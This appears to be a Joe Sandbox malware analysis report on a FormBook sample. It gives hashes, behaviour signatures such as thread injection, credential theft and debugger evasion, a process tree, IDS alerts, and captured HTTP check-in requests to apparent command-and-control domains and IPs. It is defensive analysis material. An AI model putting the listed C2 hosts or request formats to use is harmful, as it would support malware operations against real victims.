Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LlbpXphTu9.exe

Overview

General Information

Sample name:LlbpXphTu9.exe
renamed because original name is a hash value
Original sample name:1bce82ea786776f80c8ccb92ad160ede.exe
Analysis ID:1540314
MD5:1bce82ea786776f80c8ccb92ad160ede
SHA1:1f8e6d65135c31b7560ccef0d150ebee8349e7cd
SHA256:8e868ef64afa97906f7c442a93cadf7b58939b4960863c6d7ea2dcf85faf06fa
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • LlbpXphTu9.exe (PID: 5720 cmdline: "C:\Users\user\Desktop\LlbpXphTu9.exe" MD5: 1BCE82EA786776F80C8CCB92AD160EDE)
    • svchost.exe (PID: 1396 cmdline: "C:\Users\user\Desktop\LlbpXphTu9.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • kSsZkfadpV.exe (PID: 5640 cmdline: "C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regsvr32.exe (PID: 7120 cmdline: "C:\Windows\SysWOW64\regsvr32.exe" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
          • kSsZkfadpV.exe (PID: 2076 cmdline: "C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2300 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\LlbpXphTu9.exe", CommandLine: "C:\Users\user\Desktop\LlbpXphTu9.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\LlbpXphTu9.exe", ParentImage: C:\Users\user\Desktop\LlbpXphTu9.exe, ParentProcessId: 5720, ParentProcessName: LlbpXphTu9.exe, ProcessCommandLine: "C:\Users\user\Desktop\LlbpXphTu9.exe", ProcessId: 1396, ProcessName: svchost.exe
Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\LlbpXphTu9.exe", CommandLine: "C:\Users\user\Desktop\LlbpXphTu9.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\LlbpXphTu9.exe", ParentImage: C:\Users\user\Desktop\LlbpXphTu9.exe, ParentProcessId: 5720, ParentProcessName: LlbpXphTu9.exe, ProcessCommandLine: "C:\Users\user\Desktop\LlbpXphTu9.exe", ProcessId: 1396, ProcessName: svchost.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-23T17:13:07.602346+020028554641A Network Trojan was detected192.168.2.549915142.250.186.11580TCP
2024-10-23T17:13:10.151277+020028554641A Network Trojan was detected192.168.2.549931142.250.186.11580TCP
2024-10-23T17:13:12.693150+020028554641A Network Trojan was detected192.168.2.549939142.250.186.11580TCP
2024-10-23T17:13:21.315478+020028554641A Network Trojan was detected192.168.2.549982142.250.184.21180TCP
2024-10-23T17:13:23.849010+020028554641A Network Trojan was detected192.168.2.549983142.250.184.21180TCP
2024-10-23T17:13:26.391997+020028554641A Network Trojan was detected192.168.2.549984142.250.184.21180TCP
2024-10-23T17:13:35.021189+020028554641A Network Trojan was detected192.168.2.549986217.160.0.13280TCP
2024-10-23T17:13:37.583735+020028554641A Network Trojan was detected192.168.2.549987217.160.0.13280TCP
2024-10-23T17:13:40.130572+020028554641A Network Trojan was detected192.168.2.549988217.160.0.13280TCP
2024-10-23T17:13:48.552967+020028554641A Network Trojan was detected192.168.2.549990162.0.211.14380TCP
2024-10-23T17:13:51.090205+020028554641A Network Trojan was detected192.168.2.549991162.0.211.14380TCP
2024-10-23T17:13:53.642795+020028554641A Network Trojan was detected192.168.2.549992162.0.211.14380TCP
2024-10-23T17:14:02.022592+020028554641A Network Trojan was detected192.168.2.5499943.33.130.19080TCP
2024-10-23T17:14:04.567924+020028554641A Network Trojan was detected192.168.2.5499953.33.130.19080TCP
2024-10-23T17:14:08.021119+020028554641A Network Trojan was detected192.168.2.5499963.33.130.19080TCP
2024-10-23T17:14:16.255448+020028554641A Network Trojan was detected192.168.2.5499983.33.130.19080TCP
2024-10-23T17:14:17.920158+020028554641A Network Trojan was detected192.168.2.5499993.33.130.19080TCP
2024-10-23T17:14:20.521644+020028554641A Network Trojan was detected192.168.2.5500003.33.130.19080TCP
2024-10-23T17:14:30.850507+020028554641A Network Trojan was detected192.168.2.550002206.238.184.16880TCP
2024-10-23T17:14:33.396021+020028554641A Network Trojan was detected192.168.2.550003206.238.184.16880TCP
2024-10-23T17:14:36.083485+020028554641A Network Trojan was detected192.168.2.550004206.238.184.16880TCP
2024-10-23T17:14:44.529570+020028554641A Network Trojan was detected192.168.2.550006104.21.3.19380TCP
2024-10-23T17:14:47.062346+020028554641A Network Trojan was detected192.168.2.550007104.21.3.19380TCP
2024-10-23T17:14:49.773842+020028554641A Network Trojan was detected192.168.2.550008104.21.3.19380TCP
2024-10-23T17:14:58.520871+020028554641A Network Trojan was detected192.168.2.550010103.71.154.1280TCP
2024-10-23T17:15:01.601197+020028554641A Network Trojan was detected192.168.2.550011103.71.154.1280TCP
2024-10-23T17:15:03.711057+020028554641A Network Trojan was detected192.168.2.550012103.71.154.1280TCP
2024-10-23T17:15:11.992322+020028554641A Network Trojan was detected192.168.2.5500143.33.130.19080TCP
2024-10-23T17:15:15.427113+020028554641A Network Trojan was detected192.168.2.5500153.33.130.19080TCP
2024-10-23T17:15:17.092806+020028554641A Network Trojan was detected192.168.2.5500163.33.130.19080TCP
2024-10-23T17:15:26.240614+020028554641A Network Trojan was detected192.168.2.55001884.32.84.3280TCP
2024-10-23T17:15:28.781118+020028554641A Network Trojan was detected192.168.2.55001984.32.84.3280TCP
2024-10-23T17:15:31.339472+020028554641A Network Trojan was detected192.168.2.55002084.32.84.3280TCP
2024-10-23T17:15:40.065139+020028554641A Network Trojan was detected192.168.2.550022216.40.34.4180TCP
2024-10-23T17:15:42.598114+020028554641A Network Trojan was detected192.168.2.550023216.40.34.4180TCP
2024-10-23T17:15:45.177835+020028554641A Network Trojan was detected192.168.2.550024216.40.34.4180TCP
2024-10-23T17:15:53.968528+020028554641A Network Trojan was detected192.168.2.55002637.9.175.19680TCP
2024-10-23T17:15:56.391966+020028554641A Network Trojan was detected192.168.2.55002737.9.175.19680TCP
2024-10-23T17:15:58.937014+020028554641A Network Trojan was detected192.168.2.55002837.9.175.19680TCP
2024-10-23T17:16:07.744132+020028554641A Network Trojan was detected192.168.2.55003081.169.145.9580TCP
2024-10-23T17:16:10.286417+020028554641A Network Trojan was detected192.168.2.55003181.169.145.9580TCP
2024-10-23T17:16:13.338128+020028554641A Network Trojan was detected192.168.2.55003281.169.145.9580TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: LlbpXphTu9.exeReversingLabs: Detection: 44%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: LlbpXphTu9.exeJoe Sandbox ML: detected
Source: LlbpXphTu9.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kSsZkfadpV.exe, 00000004.00000000.2265011315.00000000004CE000.00000002.00000001.01000000.00000005.sdmp, kSsZkfadpV.exe, 00000006.00000002.4496679473.00000000004CE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: LlbpXphTu9.exe, 00000000.00000003.2046190994.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, LlbpXphTu9.exe, 00000000.00000003.2042482792.0000000004840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2248811171.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345506313.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2246145691.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345506313.000000000319E000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.2349900974.0000000004783000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4497891561.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4497891561.0000000004930000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.2343778120.00000000045DB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: LlbpXphTu9.exe, 00000000.00000003.2046190994.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, LlbpXphTu9.exe, 00000000.00000003.2042482792.0000000004840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2248811171.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345506313.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2246145691.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345506313.000000000319E000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, regsvr32.exe, 00000005.00000003.2349900974.0000000004783000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4497891561.0000000004ACE000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4497891561.0000000004930000.00000040.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.2343778120.00000000045DB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: regsvr32.pdb source: svchost.exe, 00000002.00000002.2344998415.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311834897.000000000081A000.00000004.00000020.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000004.00000003.2285016779.0000000000B94000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: regsvr32.exe, 00000005.00000002.4498387058.0000000004F9C000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4496934395.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000031FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2643313904.000000002D5FC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: regsvr32.exe, 00000005.00000002.4498387058.0000000004F9C000.00000004.10000000.00040000.00000000.sdmp, regsvr32.exe, 00000005.00000002.4496934395.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000006.00000002.4497823266.00000000031FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2643313904.000000002D5FC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: regsvr32.pdbGCTL source: svchost.exe, 00000002.00000002.2344998415.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311834897.000000000081A000.00000004.00000020.00020000.00000000.sdmp, kSsZkfadpV.exe, 00000004.00000003.2285016779.0000000000B94000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AFC470 FindFirstFileW,FindNextFileW,FindClose,5_2_02AFC470
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_02AFC46A FindFirstFileW,FindNextFileW,FindClose,5_2_02AFC46A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4x nop then xor eax, eax5_2_02AE9EE0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4x nop then pop edi5_2_02AEE09A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4x nop then mov ebx, 00000004h5_2_048604DE

Networking

barindex
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49931 -> 142.250.186.115:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49939 -> 142.250.186.115:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49915 -> 142.250.186.115:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 142.250.184.211:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 3.33.130.190:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 3.33.130.190:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 217.160.0.132:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 142.250.184.211:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 3.33.130.190:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 216.40.34.41:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 84.32.84.32:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 104.21.3.193:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 103.71.154.12:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 206.238.184.168:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 216.40.34.41:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50031 -> 81.169.145.95:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50026 -> 37.9.175.196:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 162.0.211.143:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 162.0.211.143:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 162.0.211.143:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 104.21.3.193:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 142.250.184.211:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 84.32.84.32:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 3.33.130.190:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50030 -> 81.169.145.95:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 3.33.130.190:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 3.33.130.190:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 84.32.84.32:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 206.238.184.168:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 103.71.154.12:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 3.33.130.190:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 3.33.130.190:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50027 -> 37.9.175.196:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 217.160.0.132:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50032 -> 81.169.145.95:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 217.160.0.132:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 206.238.184.168:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 104.21.3.193:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 103.71.154.12:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 3.33.130.190:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50028 -> 37.9.175.196:80
Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 216.40.34.41:80
Source: DNS query: www.nexari.xyz
Source: DNS query: www.onlinesbi.xyz
Source: Joe Sandbox ViewIP Address: 37.9.175.196 37.9.175.196
Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: STRATOSTRATOAGDE STRATOSTRATOAGDE
Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\LlbpXphTu9.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
Source: global trafficHTTP traffic detected: GET /bu27/?1BSHu=OBVxGh8PUTflSv4p&9X=arK7OIHQWHgtDh1sf3kI8J+cFmR/JkLbUgiPCIgJ4c+wocF+yDjQeqOS9t2GatOOF1cc3WLgy0tHiTOMZdFQznjBMcPan8e4q4HEgkesUNBGloCBbuoZKCUD7zaLk7kfsg== HTTP/1.1Host: www.refs4refs.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global trafficHTTP traffic detected: GET /6lzj/?9X=xAog8lu6Eu7QtFn4XzpwK636jvz7h/RiPL6Mqd+tn3LhinkNlGJ/IgptFmyDalBvSo4ysHuuqGyYnVLY/iOj/oM6bcsKlVS4THtoYGTMNZH5M+UIQXTFDbo/ztpf13hKpQ==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1Host: www.femaled.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global trafficHTTP traffic detected: GET /ggfl/?9X=iOyLpSsIOe7f6PU9BDul8aQY6xklT3REN+MLB2il0BbqrI6gnMpikIpJ6fgqZdrZw5fVWykdA1u8KoaFdWGY1+UrqNNya3HsbH6inHiT0cPHyFCdnV+w+9PZyCgPyXdb0A==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1Host: www.digitaladpro.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global trafficHTTP traffic detected: GET /igvi/?9X=1Z74VMbfQx3SoauZzBTM+a//aSvcAjLme6CXEJ06hrGnbB9hlVufDNB6xfV3H9TSbDN3LR5Y30pDSwif1kmvReNxbTsCEz1yl5l5s2yLmzBxFHjNeqHXJu8pRbMXulPG1g==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1Host: www.astrext.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global trafficHTTP traffic detected: GET /5b3f/?9X=zWqICce78KsRsb3emhnNvHvM+W3x418idXM1rAmyQjpDKOJvjXjB2SvsM5F8iWg/KY2mpJvFIaNUJt7K+YoonzlyhZp7qTKaZMaVqhKjy1MfdFS8xqYwAVxm55oG8sOrtw==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1Host: www.nexari.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
